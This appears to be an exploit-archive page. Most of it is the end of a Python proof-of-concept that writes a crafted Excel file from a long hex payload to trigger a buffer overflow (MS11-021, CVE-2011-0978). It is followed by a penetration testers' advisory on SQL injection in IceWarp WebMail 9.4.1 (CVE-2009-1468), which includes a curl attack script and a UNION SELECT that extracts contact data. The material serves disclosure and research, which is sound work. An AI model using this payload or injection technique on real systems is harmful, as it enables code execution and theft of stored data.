wD+="00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018"
wD+="0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021"
wD+="0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00"
wD+="080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000"
wD+="10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000"
wD+="0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000"
wD+="10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f"
wD+="0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040"
wD+="00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017"
wD+="004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000"
wD+="00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd"
wD+="001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000"
wD+="08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000"
wD+="5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00"
wD+="1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00"
wD+="000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120"
wD+="00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e"
wD+="0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000"
wD+="90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050"
wD+="400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003"
wD+="0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300"
wD+="00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010"
wD+="0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f"
wD+="00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000"
wD+="f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00"
wD+="12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000"
wD+="050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000"
wD+="003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001"
wD+="f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00"
wD+="16001600160024003d0016001600160024003d0016001600160016001600160016001600160"
wD+="01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002"
wD+="f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000"
wD+="10009f0100000000000000000000000000000000000000002000af008000000001800000500"
wD+="00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808"
wD+="d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000"
wD+="08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009"
wD+="700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000"
wD+="0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0"
wD+="0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561"
wD+="737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006"
wD+="00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a"
wD+="000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0"
wD+="00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d"
wD+="00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000"
wD+="0000000ec00080000000df000000000b601120012020000000000000000e500100000000000"
wD+="3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2"
wD+="06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265"
wD+="727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617"
wD+="2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061"
wD+="6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627"
wD+="920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074"
wD+="6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06"
wD+="600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200"
wD+="0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020"
wD+="0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020"
wD+="8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000"
wD+="0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062"
wD+="6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2"
wD+="066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053"
wD+="6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207"
wD+="46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603"
wD+="1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000"
wD+="073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000"
wD+="08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008"
wD+="800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000"
wD+="0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0"
wD+="05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468"
wD+="6520656173696573742077617920746f20617272616e67652074686520646174612066726f6"
wD+="d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000"
wD+="0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000"
wD+="000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600"
wD+="0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000"
wD+="0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002"
wD+="00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000"
wD+="100800008000000000000000000250204000000ff0081000200c10414000000150000008300"
wD+="02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03"
wD+="f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210"
wD+="00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000"
wD+="8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001"
wD+="0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000"
wD+="000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000"
wD+="00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000"
wD+="f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00"
wD+="030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000"
wD+="0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f"
wD+="0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000"
wD+="70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000"
wD+="fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0"
wD+="060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c"
wD+="0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d"
wD+="7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000"
wD+="0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000"
wD+="0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000"
wD+="e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca"
wD+="9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000"
wD+="0000000000250204000000ff0081000200c1041400000015000000830002000000840002000"
wD+="000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f"
wD+="207455000200080000020e00050000000700000002000900000008021000050002000900ff0"
wD+="00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f"
wD+="003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000"
wD+="50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000"
wD+="fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220"
wD+="042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006"
wD+="0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000"
wD+="000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817"
wD+="00670800000000000000000000020001ffffffff004400000a0000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000000000000000000000000000000feff000005010200000000000000000000000000000"
wD+="0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000"
wD+="00400000000400000048000000080000006000000012000000700000000c000000880000000"
wD+="d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520"
wD+="547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637"
wD+="26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="0000000000000000000000000000000000000000000000000feff0000050102000000000000"
wD+="00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010"
wD+="0000900000001000000500000000f0000005800000017000000880000000b00000090000000"
wD+="100000009800000013000000a000000016000000a80000000d000000b00000000c000000050"
wD+="1000002000000e40400001e0000002800000054686520477265617465722047686574746f20"
wD+="466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000"
wD+="b000000000000000b000000000000000b000000000000001e1000000800000004000000616c"
wD+="6c000300000063770003000000687700050000007175697a000500000074657374000500000"
wD+="073746174000a000000646576696174696f6e000a000000617667206772617068000c100000"
wD+="020000001e0000000b000000576f726b7368656574730003000000080000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000000000000000000000010000000"
wD+="2000000030000000400000005000000060000000700000008000000090000000a0000000b00"
wD+="00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000"
wD+="015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e"
wD+="0000001f0000002000000021000000220000002300000024000000250000002600000027000"
wD+="00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000"
wD+="3100000032000000330000003400000035000000360000003700000038000000390000003a0"
wD+="000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff"
wD+="ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004"
wD+="d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720"
wD+="079000000000000000000000000000000000000000000000000000000000000000000000000"
wD+="00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000"
wD+="000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700"
wD+="6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000"
wD+="000000000000000000000000000000000000000000000000012000201ffffffffffffffffff"
wD+="ffffff000000000000000000000000000000000000000000000000000000000000000000000"
wD+="000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00"
wD+="72006d006100740069006f006e0000000000000000000000000000000000000000000000000"
wD+="00000280002010100000003000000ffffffff00000000000000000000000000000000000000"
wD+="0000000000000000000000000000000000430000000010000000000000050044006f0063007"
wD+="5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100"
wD+="740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000"
wD+="000000000000000000000000000000000000000000000000000000000000000004b00000000"
wD+="10000000000000"
FILE = open('webDEViL-CVE-2011-0978.xls',"wb")
backtobin=binascii.unhexlify(wD)
FILE.write(backtobin)
FILE.close()
Microsoft Office Excel Axis properties record parsing buffer overflow proof of concept exploit that leverages the issue discussed in MS11-021.
/IceWarp WebMail SQL Injection ( na)
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to execute arbitrary SQL SELECT statements and
therefore read any data from the DBMS that are accessible by the Icewarp
eMail Server.
Details
=======
Product: IceWarp eMail Server / WebMail Server
Affected Versions: 9.4.1
Fixed Versions: 9.4.2
Vulnerability Type: SQL Injection
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: notified, fixed version released
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-003
Advisory Status: published
CVE: CVE-2009-1468
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1468
Introduction
============
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become
the ultimate replacement of Outlook and similar desktop mail clients."
(from the vendor's homepage)
More Details
============
The IceWarp eMail Server's web-based groupware component provides
functionality for users to store, for example, contact information,
notes, a journal or files. A search form can be used to search for such
stored items.
When users search, for example, for certain files, using the provided
search form, an HTTP POST request containing the search query in XML
form is sent from the browser to the PHP script at
https://example.com/webmail/server/webmail.php:
----- HTTP POST request ------------------------------------------------
<iq sid="73aaafec4a8db27af49c4c43bca4ac13"
uid="1239870305230" type="get" format="json">
<query xmlns="webmail:iq:items">
<account uid="user@example.com">
<folder uid="Files">
<item>
<values>
<evntitle> </evntitle>
<evnnote> </evnnote>
[..]
</values>
<filter>
<offset>0</offset>
<limit>60</limit>
<order_by>EVNTYPE asc</order_by>
<sql>(EVNTITLE LIKE '%SQL INJECTION TEST%' OR
EVNNOTE LIKE '%SQL INJECTION TEST%')
</sql>
</filter>
</item>
</folder>
</account>
</query>
</iq>
----- /HTTP POST request -----------------------------------------------
It is evident that SQL expressions are used to find matching items and
order the results. Using the information provided within the POST
request, two SQL queries are constructed and executed on the database
(relevant user-controlled parts marked with a leading ">"):
----- Query 1 ----------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
evnstarttime, evntype, evncolor, evncomplete
From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
(
> (EVNTITLE LIKE '%SQL INJECTION TEST%' OR
> EVNNOTE LIKE '%SQL INJECTION TEST%')
) AND
evnclass <> 'O'
) And
(EvnFolder='Files')
Order By
> EVNLOCATION asc
LIMIT 0,45
----- /Query 1 ---------------------------------------------------------
----- Query 2 ----------------------------------------------------------
Select Count(EVN_ID) As Count_ From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
> (EVNTITLE LIKE '%SQL INJECTION TEST%' OR
> EVNNOTE LIKE '%SQL INJECTION TEST%')
) And
(EvnFolder='Files')
----- /Query 2 ---------------------------------------------------------
Data is only returned from the database to the web application when both
queries are syntactically correct. Due to a different nesting level of
parentheses around the SQL queries' user-manipulable parts, successful
(non-blind) SQL injection requires the use of two elements within the
original HTTP POST request.
The following examples show the two queries that are executed when the
<sql> element contains the string "0=1) /* " and the <order_by> element
contains the string "*/)--". User input that is active within an SQL
query is marked with a ">", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "|":
----- Query 1a ---------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
evnstarttime, evntype, evncolor, evncomplete
From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
(
> 0=1)
+ /* part of the <sql> element
| ) AND
| evnclass <> 'O'
| ) And
| (EvnFolder='Files') Order By
+ part of the <order_by> element */
> )--
LIMIT 0,45
----- /Query 1a --------------------------------------------------------
----- Query 2a ---------------------------------------------------------
Select Count(EVN_ID) As Count_ From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
> 0=1)
+ /* part of the <sql> element
| ) And
| (EvnFolder='Files')
----- /Query 2a --------------------------------------------------------
Note that this method requires a DBMS that allows unbalanced C-style
(/**/) comments in its SQL syntax, such as SQLite3 or MySQL < 5.0.51.
For other DBMS, blind SQL injection into the first SQL query is another
option.
Proof of Concept
================
The following shell script can be used to construct a valid search
request as mentioned above. It expects a valid session ID and
corresponding username as commandline arguments, followed by arguments
that are inserted into the <order_by> and <sql> elements of the POST
request.
----- sql_inject.sh ----------------------------------------------------
#!/bin/sh
sid=$1
uid=$2
orderby=$3
if [ -n "$4" ] ; then
sql=$4
else
sql="1=0)/*"
fi
curl --silent -d '<iq sid="'$sid'" type="get" format="json">
<query xmlns="webmail:iq:items">
<account uid="'$uid'">
<folder uid="Files">
<item><values><evntitle></evntitle></values>
<filter><offset></offset><limit></limit>
<order_by>'"$orderby"'</order_by>
<sql>'"$sql"'</sql>
</filter>
</item>
</folder>
</account>
</query>
</iq>' https://example.com/webmail/server/webmail.php | \
perl -pe 's/{/\n/g' | grep "result::" | \
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'
----- /sql_inject.sh ---------------------------------------------------
For DBMS that support unbalanced C-Style comments, data can for example
be retrieved from the database as follows:
$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user@example.com \
"*/) UNION SELECT random(),'NULL',
('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem"
Joe:Plumber
John:Doe
